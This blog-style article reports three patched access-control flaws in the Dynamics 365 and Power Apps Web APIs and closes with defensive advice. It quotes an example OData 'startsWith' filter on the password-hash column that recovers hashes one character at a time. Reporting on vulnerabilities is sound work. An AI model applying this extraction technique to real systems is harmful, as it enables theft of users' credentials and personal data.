Microsoft Dynamics 365 and Power Apps are popular tools used by businesses worldwide. They help manage customer data, streamline operations, and improve productivity. However, recent findings reveal severe security vulnerabilities in their Web APIs. These flaws could have led to serious data breaches if left unaddressed.
Cybersecurity company Stratus Security discovered these vulnerabilities and reported them to Microsoft. Thankfully, Microsoft patched these issues in May 2024.
This blog explains the vulnerabilities, their impact, and the importance of constant cybersecurity vigilance.
The Discovery of Security Flaws
Based in Melbourne, Stratus Security identified three major security flaws in the Dynamics 365 and Power Apps Web APIs. Two of these flaws were in the OData Web API Filter, and the third was in the FetchXML API. These vulnerabilities posed a serious threat, potentially exposing sensitive user data.
The First Vulnerability: OData Web API Filter Access Control
The first vulnerability existed due to a lack of proper access control on the OData Web API Filter. This flaw allowed unauthorized access to the contacts table. The contacts table stores critical information such as names, phone numbers, addresses, financial details, and password hashes.
Hackers could exploit this flaw to conduct a boolean-based search. This method involves guessing each character of a password hash sequentially.
For instance, the attacker could begin by querying if the password hash starts with a specific letter or combination. They would repeat this process until they discover the complete password hash.
Stratus Security demonstrated this attack with the following example:
- First, they queried with “startsWith(adx_identity_passwordhash, ‘a’)”.
- Next, they refined the query with “startsWith(adx_identity_passwordhash, ‘aa’)”.
- They continued this process until identified the correct password hash.
This process allowed attackers to retrieve sensitive data without requiring authorized access.
The Second Vulnerability: Exploiting the Orderby Clause
The second vulnerability exploited the “orderby” clause in the OData Web API Filter. Attackers could use this clause to extract information from specific database columns. For example, they could access the column containing primary email addresses for contacts.
This vulnerability exposed more than just email addresses. Once attackers accessed email addresses, they could link them with other stolen data, increasing the damage potential.
The Third Vulnerability: FetchXML API Access
The third vulnerability was in the FetchXML API. This API allowed attackers to bypass access controls by crafting specific queries. Unlike the OData vulnerabilities, this flaw did not require the “orderby” clause to be in descending order. This added flexibility made the FetchXML exploit even more dangerous.
Attackers could use this method to access restricted columns in the contacts table. They could retrieve email addresses, password hashes, and other confidential information. Once they have compiled this data, they can sell it or crack the passwords.
The Impact of These Vulnerabilities
If attackers exploited these flaws, the consequences could have been devastating. Hackers could have stolen sensitive data, including names, email addresses, phone numbers, and password hashes. This data could then be used for phishing attacks, identity theft, or sold on the dark web.
For businesses relying on Dynamics 365 and Power Apps, this breach would mean a loss of customer trust and potential legal consequences. Data breaches can result in significant financial losses, regulatory penalties, and reputational damage.
Microsoft’s Response and Patches
Microsoft acted quickly after receiving the report from Stratus Security. By May 2024, they patched all three vulnerabilities. These updates prevent unauthorized access and protect sensitive data from future attacks. Businesses using these platforms should ensure they have installed the latest patches.
Also read | Double Clickjacking: New “Double-Click” Attack to Hack Websites
Lessons Learned
The discovery of these vulnerabilities highlights the importance of regular security audits. Even the most trusted platforms can have hidden flaws. Businesses must prioritize cybersecurity to protect their data and their customers.
Stratus Security’s findings serve as a reminder that constant vigilance is key. Cybercriminals are always looking for weaknesses to exploit. Staying updated with patches and investing in security measures is essential.
Also read | 5 Practical techniques for effective cyber threat hunting
How to Protect Your Business
If you use Microsoft Dynamics 365 or Power Apps, take these steps to safeguard your data:
- Always install the latest security updates.
- Regularly audit your systems for potential vulnerabilities.
- Train your staff on best cybersecurity practices.
- Use strong access controls to restrict unauthorized users.
- Monitor your systems for unusual activity.
These measures can reduce the risk of data breaches and ensure your systems remain secure.
Conclusion
The vulnerabilities in Microsoft Dynamics 365 and Power Apps Web API underline the importance of cybersecurity. Thanks to Stratus Security’s research, these flaws were identified and patched before causing significant harm. However, this incident highlights the need for businesses to remain proactive in protecting their data.
Staying informed about security risks and applying updates promptly is crucial. Cybersecurity is a shared responsibility, and vigilance is the best defense against evolving threats.
By following best practices and staying alert, businesses can ensure their data remains safe. The lessons from this incident are clear: constant vigilance and prompt action can prevent devastating cyberattacks.